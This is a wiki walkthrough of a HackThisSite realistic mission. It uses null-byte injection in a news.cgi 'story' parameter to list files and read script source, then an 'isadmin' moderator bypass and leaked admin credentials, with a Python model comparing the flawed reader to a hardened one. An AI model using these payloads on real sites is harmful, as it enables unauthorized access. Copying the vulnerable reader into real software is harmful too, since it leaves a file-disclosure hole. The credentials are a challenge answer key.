Hackthissite/Realistic/Level14

From aldeid

Information

Real14.png
  • Level: Realistic::14 (Yuppers Internet Solutions)
  • URL: http://www.hackthissite.org/missions/realistic/14/
  • Difficulty: 4/5
  • Exercise: An internet start-up is rumoured to be selling user data and usage habits to advertisers while they claim the opposite. Hack in and get some proof.
  • Message: You've probably heard of Yuppers Internet Solutions before. They started in 1997 and are now one of the top websites on the net. I was an intern at Yuppers for a time, but quit when I learned that the admins were selling user data and usage habits to advertisers while saying the opposite. Unfortunately, I couldn't get out of the building with any proof and don't have any high-level access. I do know, however, that much of the coding on their site was done by amateurs and is probably insecure. Can you hack in and get some proof?

Solution

Step 1: Find an admin account

Find pages

To find a way in, we try injections in the form fields (parameters passed by GET are the easiest to tamper with). The news reader (news.cgi) accepts a single parameter named "story". Injecting a dot followed by a URL-encoded null byte (.%00) makes the script open the current directory instead of a story file, and we get this listing:

Hackthissite-14-1.png

Sorted by type, the listing contains:

Text files
Web pages
Cgi scripts
Htaccess
Javascripts
Directories
Images

In addition, the HTML source of the page reveals further information:

Hackthissite-14-2.png

Read source code of Perl scripts

We now use the same vulnerability in the news reader (news.cgi?story=) to read the source of moderator.cgi: the null byte cuts the filename off before whatever extension the script appends, so any file in the directory can be requested.

Point the browser to http://www.hackthissite.org/missions/realistic/14/news.cgi?story=moderator.cgi%00. You should see this:

Hackthissite-14-3.png

Scrolling down, we find the test that the script applies to the moderator ID:

Hackthissite-14-4.png

If that check does nothing more than look for the string "isadmin", then supplying "isadmin" as the moderator ID should be enough to be treated as an admin.
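The two requests above (.%00 for the listing, moderator.cgi%00 for the source) work because of the same defect: the script builds a filename from the untrusted "story" value, and the null byte ends the name before the extension the script appends. The following Python model is an added example and not the mission's own news.cgi (whose source is not on this page). It assumes the script appends a fixed ".txt" and that a directory path yields a listing; recent Perl releases and Python 3 refuse filenames containing NUL, so the legacy behaviour is reproduced by truncating at the NUL explicitly, which is what the C open(2) call behind an old Perl open() did. A hardened resolver with a whitelist and a web-root containment check is shown beside it.

```python
"""Model of the null-byte truncation behind news.cgi?story=... (added example,
not the mission's own script).

Assumptions (not on the page): the CGI appends a fixed ".txt" to the story
name before opening it, and a directory path produces a listing.  Recent
Perl and Python 3 refuse file names containing NUL, so the legacy behaviour
is reproduced here by truncating explicitly, the way the C open(2) call
behind an old Perl open() did.
"""
import os
import re
import tempfile
from urllib.parse import unquote_to_bytes

STORY_SUFFIX = b".txt"  # assumed extension appended by the legacy script
SAFE_STORY = re.compile(r"[A-Za-z0-9_-]{1,64}")


def legacy_path(story_param: str) -> bytes:
    """Path the legacy reader effectively opens for ?story=<story_param>.

    The raw parameter is URL-decoded and the suffix appended; the kernel
    stops reading the name at the first NUL, so "%00" discards the suffix.
    """
    raw = unquote_to_bytes(story_param) + STORY_SUFFIX
    return raw.split(b"\x00", 1)[0]


def legacy_read(webroot: str, story_param: str) -> str:
    """Serve what the vulnerable reader would return: file body or listing."""
    target = os.path.join(webroot.encode(), legacy_path(story_param))
    if os.path.isdir(target):
        # Modelled on the listing the mission shows for story=.%00
        return "\n".join(sorted(name.decode() for name in os.listdir(target)))
    with open(target, "rb") as fh:
        return fh.read().decode()


def safe_path(story_param: str):
    """Hardened resolution: a plain story name or nothing at all."""
    decoded = unquote_to_bytes(story_param)
    if b"\x00" in decoded or not decoded.isascii():
        return None
    name = decoded.decode("ascii")
    if SAFE_STORY.fullmatch(name) is None:  # no "/", "..", "%" or "." at all
        return None
    return name.encode() + STORY_SUFFIX


def safe_read(webroot: str, story_param: str) -> str:
    """Hardened reader: validate the name, then pin the path inside webroot."""
    rel = safe_path(story_param)
    if rel is None:
        raise ValueError("story parameter rejected")
    root = os.path.realpath(webroot.encode())
    target = os.path.realpath(os.path.join(root, rel))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("story path escapes the web root")
    with open(target, "rb") as fh:
        return fh.read().decode()


def demo() -> dict:
    """Build a throwaway web root with constructed files and run both readers."""
    root = tempfile.mkdtemp(prefix="yuppers-")
    constructed = {  # constructed sample content, not the real site
        "news1.txt": "Yuppers launches a new portal\n",
        "moderator.cgi": "#!/usr/bin/perl\n# moderator login (constructed stand-in)\n",
        "news.cgi": "#!/usr/bin/perl\n# story reader (constructed stand-in)\n",
    }
    for name, body in constructed.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    return {
        "story": legacy_read(root, "news1"),
        "listing": legacy_read(root, ".%00").splitlines(),
        "source": legacy_read(root, "moderator.cgi%00"),
        "safe_story": safe_read(root, "news1"),
        "safe_rejects": [p for p in ("moderator.cgi%00", ".%00", "../news1")
                         if safe_path(p) is None],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Run it directly to see the three legacy requests succeed (story text, directory listing, script source) while the hardened resolver rejects every payload that is not a bare story name. The whitelist is deliberately stricter than "no NUL": filtering only the null byte would still leave traversal and extension-dropping tricks such as "../" or an absolute path.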

Go to that page:

http://www.hackthissite.org/missions/realistic/14/moderator.cgi

and enter "isadmin" as the moderator ID:

Hackthissite-14-5.png

On the next screen, enter "*":

Hackthissite-14-6.png

You should now reach this screen:

Hackthissite-14-7.png

Login as admin

From the welcome page, access the authentication form:

http://www.hackthissite.org/missions/realistic/14/login.html

and log in with the following credentials:

  • Username: webguy
  • Password: reallyreallylongpasswordthatisveryveryveryhardtoguessorcrack

That works: mission completed.
